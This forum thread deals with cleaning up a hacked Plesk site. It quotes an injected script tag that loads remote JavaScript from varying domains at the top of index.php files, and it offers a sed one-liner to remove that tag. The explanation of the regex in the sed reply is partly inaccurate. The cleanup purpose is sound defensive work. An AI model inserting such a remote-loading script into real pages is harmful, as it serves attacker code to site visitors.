I'm unfortunately once more dealing with a hacked site on a Linux Plesk server. While the issue is fixed with FTP access changed (it got down to the famous Filezilla FTP codes hack on a PC) I'd appreciate to know how to edit files as it may take over an hour to restore the site to the most recent backup we have, and I'd be glad to have it back online faster. The hack is rather simple: a javascript code was inserted in many index* (only index.php it seems) files in the site. I'm looking for a way to mass-edit the hacked files, knowing that even though the target javascript code is the same, it is called from a number of probably also hacked sites. So while my legitimate index file used to start with

<?php

it now starts like

<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php

As that chain contains a variable, could you help me find a sure-fire method to edit all the changed Index files (about 80 found) ? I have used a SED replace before but this time part of the chain to replace varies, so could I use a wildcard ? Best regards, thanks for shedding light !

find -name 'index.php' -print0 |
    xargs -0 sed -i '1s#^<script type="text/javascript" src="http://.*\?/facebook.php"></script>##g'

Should do wonders

the sed command:

• 1 (match in first line)
• s#pattern#replacement#g (replace pattern by replacement, not that the latter is empty)
• ^ must match at start of line
• .*\? accept arbitrary length of sequence of characters; however if more than one a match for the whole pattern could be made, only match the shortest possible variant of it

Cheers

I sincerely hope your not actually adminning a production domain. You should inform your users, get the problem fixed, offer the users to go back to a recent backup that hasn't got the problem.

There is no telling what else has been tampered with.

I'm glad my VPS is somewhere else!

I would fix the Cross side scripting exploit before this problem is addressed or it will all be in vain. When thats done a simple search and replace of blocks of script that contain a common string should be sufficient.